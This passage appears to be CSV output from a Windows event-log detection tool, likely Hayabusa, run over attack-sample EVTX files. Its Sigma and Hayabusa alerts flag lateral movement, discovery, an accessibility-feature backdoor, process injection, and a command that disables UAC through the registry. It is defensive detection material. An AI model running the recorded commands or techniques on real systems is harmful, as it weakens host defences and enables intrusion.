PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 14:03:45.100 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/file_event_win_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:06.339 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: 
ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:28.860 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 17:17:26.440 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.440 +00:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.738 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.738 
+00:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:31:27.973 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx +2019-05-14 17:42:52.833 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 
DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:42:52.848 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:42:53.854 +00:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:43:03.888 +00:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 04:18:40.474 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-15 04:18:40.474 +00:00,IEWIN7,13,high,Evas,Office Security 
Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 01:31:36.426 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:31:36.454 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:31:36.456 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: 
DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation_sysmon/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 13:10:13.760 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx +2019-05-16 14:17:15.762 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: 
DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 16:08:30.516 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: 
C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:34.867 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-18 17:16:08.348 +00:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:08.348 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
